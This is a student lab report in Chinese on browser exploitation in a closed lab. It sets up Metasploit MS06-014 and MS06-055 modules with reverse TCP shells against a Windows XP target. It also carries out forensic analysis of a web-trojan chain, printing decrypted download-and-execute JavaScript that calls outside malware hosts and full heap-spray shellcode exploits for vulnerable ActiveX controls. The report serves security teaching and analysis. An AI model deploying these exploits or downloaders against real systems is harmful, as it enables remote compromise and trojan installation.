20252913 2025-2026-2 《网络攻防实践》实践十一报告

20252913 2025-2026-2 《网络攻防实践》实践十一报告

1.实践内容

1.1 web浏览器渗透攻击

​ 本次依托kali攻击机与 Windows 靶机开展浏览器渗透攻击实操,完整完成网页木马制作与浏览器攻击流程。实操中选取 Metasploit 平台内 MS06-014 渗透攻击模块,选定远程 Shell 连接类载荷,依次配置服务器地址、URL 相关参数,执行攻击指令生成恶意网页木马脚本。随后在 Windows 靶机开启浏览器,确认设备与攻击服务器网络通畅,访问恶意木马网页链接。最后在攻击机端监测攻击运行状态,依托渗透成功建立的远程会话,向靶机下发并执行远程操作命令。

1.2 取证分析实践—网页木马攻击场景分析

本次针对网页木马攻击场景开展取证溯源分析。首先访问 start.html 文件,从中获取 new09.htm 访问地址;进入对应网页后,每解析得到新文件地址,均计算其 32 位小写 MD5 哈希值,以哈希字符串作为无后缀文件名,前往指定网络路径下载对应文件。若解析所得文件为网页、脚本类文件,则持续开展解密拆解工作;若为二进制程序文件,采用静态反汇编、动态调试方式剖析程序内容。循环执行解析、下载、分析操作,直至全部关联文件核查完毕。

1.3 攻防对抗实践—web浏览器渗透攻击攻防

攻防双方开展浏览器渗透对抗演练。攻击端借助 Metasploit 工具,针对两款不同网页浏览器安全漏洞分别编写渗透攻击代码,对代码做混淆加密处理后整合生成恶意访问链接,伪装成常规邮件内容发送至防守方。防守端接收邮件后,提取内含的挂马链接,对链接及代码进行解混淆还原,恢复攻击代码原始内容,判定代码对应的浏览器类型与具体安全漏洞点位。

2.实践过程

实验环境:

  • Kali:192.168.200.7
  • WinXPattacker:192.168.200.3
  • Win2kServer:192.168.200.8

2.1 web浏览器渗透攻击

1、首先测试kali和靶机的连通性:

image-20260525184803905

image-20260525184809466

2、通过msfconsole命令在kali攻击机中启动Metasploit 控制台:

image-20260525184854486

3、通过search MS06-014 命令搜索 MS06-014 相关的漏洞模块:image-20260525184938533

4、通过命令选择exploit/windows/browser/ie_createobject模块进入并查看参数:

use exploit/windows/browser/ie_createobject
show options

image-20260525185037719

image-20260525185117821

5、对参数进行设置后启动攻击:

set payload windows/shell/reverse_tcp #选择反向tcp shell载荷
set LHOST 192.168.200.7 #设置攻击机IP
#监听端口使用默认4444端口

exploit

image-20260525185403990

攻击成功后生成恶意URL:

http://192.168.200.7:8080/PynsHYX5

6、靶机在IE浏览器中访问此地址并显示一串字符:

image-20260525185527442

7、此时攻击机中显示会话建立成功:

image-20260525185645156

在控制台中进入远程shell:

sessions -i 1

然后可通过命令获取靶机信息:

ipconfig #查看主机IP
ver #查看系统版本
dir #查看目录

image-20260525185820315

image-20260525185830222

攻击成功。

2.2 取证分析实践—网页木马攻击场景分析

1、用记事本打开start.html,搜索new09.htm,可以看到有一个iframe调用了new09.htm:

image-20260525190036880

2、根据学习通的《网页挂马分析实践参考(上)》文件中可以补全new09.htm的关键语句为:

<script language="javascript" type="text/javascript" src="http://js.users.51.la/1299644.js"></script>
<iframe width='0' height='0' src='http://aa.18dd.net/aa/kl.htm'></iframe>

可以看出该文件通过隐藏iframe加载 kl.htm,并通过script 标签加载1299644.js。

计算http://aa.18dd.net/aa/kl.htmhttp://js.users.51.la/1299644.js的MD5值:

echo -n "http://aa.18dd.net/aa/kl.htm" | md5sum
echo -n "http://js.users.51.la/1299644.js" | md5sum

image-20260525190351566

3、在学习通下载的hashed文件夹中找到这两个以MD5值命名的文件:

image-20260525190453395

image-20260525190458273

对第一个包含大量代码的文件进行观察发现关键语句:

image-20260525190614969

可以看出代码使用了XXTEA和Base64加密,密钥为\x73\x63\x72\x69\x70\x74,通过16进制转文本网站进行转换,可得到XXTEA密钥:

image-20260525190933057

密钥为:script

4、将文件密文复制到解密工具并输入密钥:

image-20260525191146616

image-20260525191151347

得到明文为JavaScript代码:

function init(){document.write();}
window.onload = init;
if(document.cookie.indexOf('OK')==-1){
try{var e;
var ado=(document.createElement("object"));
ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
var as=ado.createobject("Adodb.Stream","")}
catch(e){};
finally{
var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie='ce=windowsxp;path=/;expires='+expires.toGMTString();
if(e!="[object Error]"){
document.write("<script src=http:\/\/aa.18dd.net\/aa\/1.js><\/script>")}
else{
try{var f;var storm=new ActiveXObject("MPS.StormPlayer");}
catch(f){};
finally{if(f!="[object Error]"){
document.write("<script src=http:\/\/aa.18dd.net\/aa\/b.js><\/script>")}}
try{var g;var pps=new ActiveXObject("POWERPLAYER.PowerPlayerCtrl.1");}
catch(g){};
finally{if(g!="[object Error]"){
document.write("<script src=http:\/\/aa.18dd.net\/aa\/pps.js><\/script>")}}
try{var h;var obj=new ActiveXObject("BaiduBar.Tool");}
catch(h){};
finally{if(h!="[object Error]"){
obj.DloadDS("http://down.18dd.net/bb/bd.cab", "bd.exe", 0)}}
}}}

5、解密后的代码中,提取到恶意URL:

http://aa.18dd.net/aa/1.js
http://aa.18dd.net/aa/b.js
http://aa.18dd.net/aa/pps.js
http://down.18dd.net/bb/bd.cab

在受害者访问包含这些资源引用的挂马网页时,浏览器自动加载1.js/b.js/pps.js脚本,脚本执行漏洞探测和攻击代码,攻击完成后,攻击者就能通过 Metasploit 等工具控制受害者电脑。

依次计算这些URL的MD5值:

echo -n "http://aa.18dd.net/aa/1.js" | md5sum
echo -n "http://aa.18dd.net/aa/b.js" | md5sum
echo -n "http://aa.18dd.net/aa/pps.js" | md5sum
echo -n "http://down.18dd.net/bb/bd.cab" | md5sum

image-20260525191840117

6、分析1.js

通过16进制转字符串在线工具对代码进行转换:

image-20260525192112960

得到1.js的代码为:

var url="http://down.18dd.net/bb/014.exe";try{var xml=ado.CreateObject("Microsoft.XMLHTTP","");xml.Open

("GET",url,0);xml.Send();as.type=1;as.open();as.write(xml.responseBody);path="..\\ntuser.com";as.savetofile(path,2);as.close

();var shell=ado.createobject("Shell.Application","");shell.ShellExecute("cmd.exe","/c "+path,"","open",0)}catch(e){}

通过AI分析此代码可知:此代码利用 ActiveX 控件远程代码执行漏洞,从 down.18dd.net 下载 014.exe(MS06-014 漏洞攻击木马),保存成 ..\\ntuser.com,伪装成系统文件,躲避查杀,并使用 ShellExecute + 窗口模式 0隐藏运行。

7、分析b.js:

代码为:

eval(
  (function (p, a, c, k, e, d) {
    e = function (c) {
      return c;
    };
    if (!"".replace(/^/, String)) {
      while (c--) {
        d[c] = k[c] || c;
      }
      k = [
        function (e) {
          return d[e];
        },
      ];
      e = function () {
        return "\\w+";
      };
      c = 1;
    }
    while (c--) {
      if (k[c]) {
        p = p.replace(new RegExp("\\b" + e(c) + "\\b", "g"), k[c]);
      }
    }
    return p;
  })(
    '5 1=29("%10%10");5 26=20;5 14=29("%82%3"+"%81%10%83%84%87%3%86%85"+"%79%78%72%22%71%70%69%73"+"%74%77%17%76%75%88%89%103"+"%17%102%101%104%105%108%107%106"+"%100%99%93%92%25%91%68%94"+"%95%98%97%25%96%109%63%37"+"%31%39%41%40%19%42%43%45"+"%38%3%44%46%35%12%32%22"+"%33%36%34%3%19%67%61%60"+"%59%62%47%66%65%64%58%57"+"%16%24%51%50%49%24%48%16"+"%52%53%56%55%54%90%152%168"+"%167%166%165%110%170%173%12%172"+"%171%164%12%157%156%155%154%158"+"%159%162%161%160%175%185%189%188"+"%187%191%193%195%194%23%192%190"+"%186%179%178%177%176%180%181%184"+"%183%182%174%153%18%11%125%124"+"%15%123%122%126%127%130%21%129"+"%128%121%120%114%18%11%113%112"+"%111%115%116%119%118%117%21%131"+"%132%146%11%144%147%148%151%150%149%143%142%136%23%135%134%133%137%15%3");5 4=26+14.6;13(1.6<4)1+=1;28=1.30(0,4);2=1.30(0,1.6-4);13(2.6+4<138)2=2+2+28;27=141 140();139(7=0;7<169;7++)27[7]=2+14;5 8=\'\';13(8.6<145)8+="\\9\\9\\9\\9";163.80(8)',
    10,
    196,
    "|bigblock|block|u0000|slackspace|var|length|x|buffer|x0a|u9090|u0041|u57ff|while|shellcode|u6578|u4320|ufb03|u7972|uc683||u6461|ud88b|u7465|u4343|u468b|headersize|memory|fillblock|unescape|substring|u008b|u5afc|u016a|u0057|u5652|ue859|uc103|u6ae8|uc303|uf78b|ufa8b|u8b0e|u6ad0|u8300|u5904|u0dc6|u5e80|u03c6|u632f|u03c7|u6643|u206a|uff53|u5c03|u04c7|uec57|u646d|u6303|ufa75|u803e|u8046|u3680|u02e1|uc7dc|u8b40|uec83|u5613|ud1c3|u1e74|u8b3c|u738b|u0840|u0378|u8bf3|u3314|u4e8b|u207e|u8bad|u1c70|rawParse|u9000|uf3e9|u5a90|ua164|u8b0c|u408b|u0030|u56ed|u5157|u2e61|u0324|ucd8b|u5e5f|u03e1|u33c1|u031c|u088b|u66c9|u59e9|ue245|u0e6a|uf28b|u3f8b|uf359|u74a6|ufcef|u835f|u5908|uc1c3|u50c0|u6e6f|u6d6c|u7275|u6172|u5500|u4c52|u6f6c|u6e77|u6f44|u6269|u4c64|u7845|u0063|u456e|u6957|u7469|u6854|u616f|u4c00|u6572|u6f54|u6946|u6662|u2f62|u622f|u6e2e|u652e|0x40000|for|Array|new|u6464|u3831|u7468|4068|u656c|u7074|u2f3a|u2e6e|u776f|u642f|uc765|u6f74|uff58|u0040|u2451|u68f0|u33d0|uacc0|u5251|uf975|uc085|storm|u5300|u3300|u0065|u7804|u0344|300|u5350|u6adc|u8bfc|u5056|u6365|u5356|u6547|u0073|u7365|u7264|u5374|u7379|u7269|u446d|u6574|ud2ff|u6441|u33ee|ue2ab|u595a|u636f|uc3c0|u7250|u0ce8|u47ff|uffff".split(
      "|",
    ),
    0,
    {},
  ),
);

通过AI辅助分析可知:此代码使用Heap Spray + Shellcode 注入,外层代码作为混淆器,把恶意代码变成乱码,躲避杀毒软件,运行时自动解密执行,向内存注入恶意代码,自动下载并执行远程木马。

AI还原代码:

var bigblock = unescape("%10%10");
var headersize = 20;
var shellcode = unescape(
"%82%3%81%10%83%84%87%3%86%85"+
"%79%78%72%22%71%70%69%73"+
"%74%77%17%76%75%88%89%103"+
"%17%102%101%104%105%108%107%106"+
"%100%99%93%92%25%91%68%94"+
"%95%98%97%25%96%109%63%37"+
"%31%39%41%40%19%42%43%45"+
"%38%3%44%46%35%12%32%22"+
"%33%36%34%3%19%67%61%60"+
"%59%62%47%66%65%64%58%57"+
"%16%24%51%50%49%24%48%16"+
"%52%53%56%55%54%90%152%168"+
"%167%166%165%110%170%173%12%172"+
"%171%164%12%157%156%155%154%158"+
"%159%162%161%160%175%185%189%188"+
"%187%191%193%195%194%23%192%190"+
"%186%179%178%177%176%180%181%184"+
"%183%182%174%153%18%11%125%124"+
"%15%123%122%126%127%130%21%129"+
"%128%121%120%114%18%11%113%112"+
"%111%115%116%119%118%117%21%131"+
"%132%146%11%144%147%148%151%150%149%143%142%136%23%135%134%133%137%15%3"
);
#寻找 Windows 系统核心函数,后台下载 exe 木马,不弹窗、不提示、直接运行


// 2. 计算内存空间大小
var slackspace = headersize + shellcode.length;

// 3. 循环填充内存(Heap Spray 核心)
#用大量重复数据填满浏览器内存,让漏洞执行时,100% 命中恶意代码

while (bigblock.length < slackspace)
    bigblock += bigblock;

var fillblock = bigblock.substring(0, slackspace);
var block = bigblock.substring(0, bigblock.length - slackspace);

while (block.length + slackspace < 4068)
    block = block + block + fillblock;

// 4. 构造内存数组
var memory = new Array();
for (x = 0; x < 300; x++)
    memory[x] = block + shellcode;

// 5. 构造缓冲区
var buffer = '';
while (buffer.length < shellcode.length)
    buffer += "\\9\\9\\9\\9";

// 6. 触发漏洞执行 Shellcode
rawParse(buffer);

8、分析pps.js:

首先通过八进制转字符串工具将代码还原:

image-20260525193654413

/*%u66c9%u088b%u468b%u031c%uc1c3%u02e1%uc103" +
"%u008b%uc303%ufa8b%uf78b%uc683%u8b0e%u6ad0%u5904" +
"%u6ae8%u0000%u8300%u0dc6%u5652%u57ff%u5afc%ud88b" +
"%u016a%ue859%u0057%u0000%uc683%u5613%u8046%u803e" +
"%ufa75%u3680%u5e80%uec83%u8b40%uc7dc%u6303%u646d" +
"%u4320%u4343%u6643%u03c7%u632f%u4343%u03c6%u4320" +
"%u206a%uff53%uec57%u*/
pps=(document.createElement("object"));
pps.setAttribute("classid","clsid:5EC7C511-CD0F-42E6-830C-1BD9882F3458")
var shellcode = unescape("%uf3e9%u0000"+
"%u9000%u9090%u5a90%ua164%u0030%u0000%u408b%u8b0c" +
"%u1c70%u8bad%u0840%ud88b%u738b%u8b3c%u1e74%u0378" +
"%u8bf3%u207e%ufb03%u4e8b%u3314%u56ed%u5157%u3f8b" +
"%ufb03%uf28b%u0e6a%uf359%u74a6%u5908%u835f%u04c7" +
"%ue245%u59e9%u5e5f%ucd8b%u468b%u0324%ud1c3%u03e1" +
"%u33c1%u66c9%u088b%u468b%u031c%uc1c3%u02e1%uc103" +
"%u008b%uc303%ufa8b%uf78b%uc683%u8b0e%u6ad0%u5904" +
"%u6ae8%u0000%u8300%u0dc6%u5652%u57ff%u5afc%ud88b" +
"%u016a%ue859%u0057%u0000%uc683%u5613%u8046%u803e" +
"%ufa75%u3680%u5e80%uec83%u8b40%uc7dc%u6303%u646d" +
"%u4320%u4343%u6643%u03c7%u632f%u4343%u03c6%u4320" +
"%u206a%uff53%uec57%u04c7%u5c03%u2e61%uc765%u0344" +
"%u7804%u0065%u3300%u50c0%u5350%u5056%u57ff%u8bfc" +
"%u6adc%u5300%u57ff%u68f0%u2451%u0040%uff58%u33d0" +
"%uacc0%uc085%uf975%u5251%u5356%ud2ff%u595a%ue2ab" +
"%u33ee%uc3c0%u0ce8%uffff%u47ff%u7465%u7250%u636f" +
"%u6441%u7264%u7365%u0073%u6547%u5374%u7379%u6574" +
"%u446d%u7269%u6365%u6f74%u7972%u0041%u6957%u456e" +
"%u6578%u0063%u7845%u7469%u6854%u6572%u6461%u4c00" +
"%u616f%u4c64%u6269%u6172%u7972%u0041%u7275%u6d6c" +
"%u6e6f%u5500%u4c52%u6f44%u6e77%u6f6c%u6461%u6f54" +
"%u6946%u656c%u0041%u7468%u7074%u2f3a%u642f%u776f%u2e6e%u3831%u6464%u6e2e%u7465%u622f%u2f62%u7070%u2e73%u7865%u0065");
var bigblock = unescape("%u9090%u9090");
var headersize = 20;
var slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (x=0; x<400; x++) memory[x] = block + shellcode;
var buffer = '';
while (buffer.length < 500) buffer+="\x0a\x0a\x0a\x0a";
pps.Logo = buffer

  • 创建恶意 ActiveX 对象
pps=(document.createElement("object"));
pps.setAttribute("classid","clsid:5EC7C511-CD0F-42E6-830C-1BD9882F3458")

加载有漏洞的 ActiveX 控件

这个 CLSID 对应存在缓冲区溢出漏洞的组件

  • 恶意代码主体:Shellcode
var shellcode = unescape("%uf3e9%u0000...");

这是二进制机器码的 Unicode 编码形式:定位系统函数、

拼接木马下载地址、后台下载并执行 http://down.18dd.net/bb/pps.exe 这类木马

  • 构造溢出数据(堆喷射)
var bigblock = unescape("%u9090%u9090");
...
memory = new Array();
for (x=0; x<400; x++) memory[x] = block + shellcode;

Heap Spray 堆喷射技术:用大量 0x9090(NOP 滑行)铺满内存,提高溢出后跳转到 Shellcode的成功率

  • 触发漏洞
var buffer = '';
while (buffer.length < 500) buffer+="\x0a\x0a\x0a\x0a";
pps.Logo = buffer

向漏洞控件的 Logo 属性传入超长数据,触发缓冲区溢出,劫持 EIP,执行 Shellcode

这段代码利用 IE 浏览器存在漏洞的 ActiveX 控件,触发缓冲区溢出,执行内置的恶意汇编代码(Shellcode),自动下载并运行远程木马,实现对电脑的远程控制。

9、bd.cab与可执行文件的同源性分析:

找到可执行文件:14.exebf.exepps.exebd.exe并分别计算MD5值:

md5sum 14.exe bf.exe pps.exe bd.exe

image-20260525194443106

可以看出bf.exepps.exebd.exe为同源文件,是同一个文件的不同副本。

使用超级巡警脱壳工具对14.exe进行脱壳:

image-20260525194656143

pps.exe加载到超级巡警脱壳工具显示Borland Delphi v6.0 - v7.0,可知bf.exepps.exebd.exe无需脱壳:

image-20260525194825642

使用IDA Pro Free 加载pps.exe:

image-20260525195026533

可以发现大量的下载链接,可知此程序会下载大量木马。

然后使用 W32Dasm加载pps.exe,点击右上角的串式参考:

image-20260525195030884

出现以下关键代码:

AutoRun.inf
open=
shell\Auto\command=

功能是写入 U 盘 / 磁盘根目录的AutoRun.inf,实现双击磁盘就自动运行木马。

cmd /c date 1981-01-01

功能为篡改系统时间,让依赖时间验证的杀毒软件失效

让证书、许可、监控全部异常。

IEXPLORE.EXE
drivers/klif.sys
advapi32.dll
Kernel32.dll
ntdll.dll
ChangeServiceConfig2A/W

功能为关闭 / 绕过 IE 安全保护机制,对抗安全软件等,操作系统服务,实现长期控制。

可知该恶意程序具备远程批量木马下载、AutoRun 传播、系统时间篡改、IE 浏览器漏洞利用、服务后门驻留、自我销毁、对抗杀毒软件等功能,是典型的网页木马下载器与持久化后门,用于完全控制受害主机。

然后对14.exe进行分析:

image-20260525195840610

代码为恶意批处理脚本与木马驻留程序,主要功能包括:

  1. 执行后自我删除,清除运行痕迹;
  2. 通过修改注册表实现开机自启动;
  3. 伪造 CLSID 组件,将木马伪装成系统 ActiveX 控件;
  4. 把恶意程序放入系统目录并伪装成字体文件隐藏;
  5. 实现窗口钩子,用于系统控制与信息窃取;
  6. 构造恶意 URL,用于木马下载。

整体作用是让木马持久化驻留、隐蔽运行、开机自启、难以清除。

2.3 攻防对抗实践—web浏览器渗透攻击攻防

1、启动Metasploit并设置参数构造MS06-014漏洞渗透攻击代码、执行攻击:

msfconsole
# 加载IE浏览器漏洞利用模块(ie_createobject),用于针对IE浏览器执行远程代码攻击
use exploit/windows/browser/ie_createobject

# 设置攻击成功后返回的远程Shell载荷,建立反向TCP连接
set payload windows/shell/reverse_tcp 
set SRVHOST 192.168.200.7  # 设置本地监听服务器IP(攻击机IP)
set SRVPORT 8080  # 设置恶意网页服务监听端口,用于提供挂马页面          
set LHOST 192.168.200.7  # 设置反弹连接的本地IP 
set LPORT 4444  # 设置反弹连接监听端口         
exploit

image-20260525200342536

生成的恶意URL:http://192.168.200.7:8080/gxBlkEV

2、构造MS06-055漏洞渗透攻击代码并执行攻击:

use exploit/windows/browser/ms06_055_vml_method
set payload windows/shell/reverse_tcp
set SRVHOST 192.168.200.7 
set SRVPORT 8081
set LHOST 192.168.200.7
set LPORT 4445
exploit

image-20260525200551502

生成的恶意URL:http://192.168.200.7:8081/NU6pgfH1MYaB

3、在靶机中通过IE浏览器打开这两个恶意URL:

http://192.168.200.7:8080/gxBlkEV
http://192.168.200.7:8081/NU6pgfH1MYaB

image-20260525200635778

image-20260525200646312

4、查看URL源代码:

image-20260525200736685

image-20260525200740271

5、对URL代码进行压缩格式化并分析:

MS06-014漏洞的URL:

image-20260525200838267

该 HTML 是针对 IE 浏览器的恶意挂马页面,采用 JavaScript 字符串混淆技术隐藏攻击逻辑。页面加载后自动遍历13 个高危 ActiveX 控件漏洞 CLSID,尝试创建 WScript.Shell 与 ADODB.Stream 等系统对象。一旦漏洞利用成功,便从当前服务器下载恶意 payload 文件,保存至系统临时目录并后台静默执行,最终实现远程代码执行与主机控制。

MS06-055漏洞的URL:

image-20260525200842097

这是恶意网页木马的 “混淆外壳”,本身不直接执行攻击,核心作用是隐藏真实攻击逻辑、绕过安全检测,让挂马页面能顺利被靶机的旧版 IE 浏览器加载并执行漏洞利用代码。

6、在靶机的任务管理器中可以看到随机命名的xPfnzdssInAuVJp进程和占用178MB的IE浏览器进程,

image-20260525201425688

image-20260525201429061

xPfnzdssInAuVJp进程是MS06-014与MS06-055漏洞攻击成功后植入的后门载体,占用很高的IE进程说明被注入了恶意载荷代码,已被攻击成功。

3.学习中遇到的问题及解决

- 问题1:执行 ms06_055_vml_method 漏洞利用时,出现 Handler failed to bind to 0.0.0.0:4444: The address is already in use 错误,无法建立 Meterpreter 会话
- 问题1解决方案:4444端口在执行MS06-014漏洞攻击时已被占用,修改端口号后攻击成功。

4.实践总结

本次实践我围绕Web浏览器渗透攻防展开,通过Metasploit的MS06-014模块,完整复现了从构造恶意网页、触发漏洞到获取靶机控制权限的流程,直观理解了浏览器漏洞注入与会话建立的原理。在取证分析环节,通过MD5哈希下载、文件解密与调试,我掌握了网页木马的多层嵌套与代码分析方法。攻防对抗中,我体会到混淆代码的隐蔽性与漏洞分析的难点,也认识到老旧浏览器漏洞的危害性,更深刻理解了浏览器安全防护与恶意代码分析的重要性。

posted @ 2026-05-25 20:20  G116h6  阅读(108)  评论(0)    收藏  举报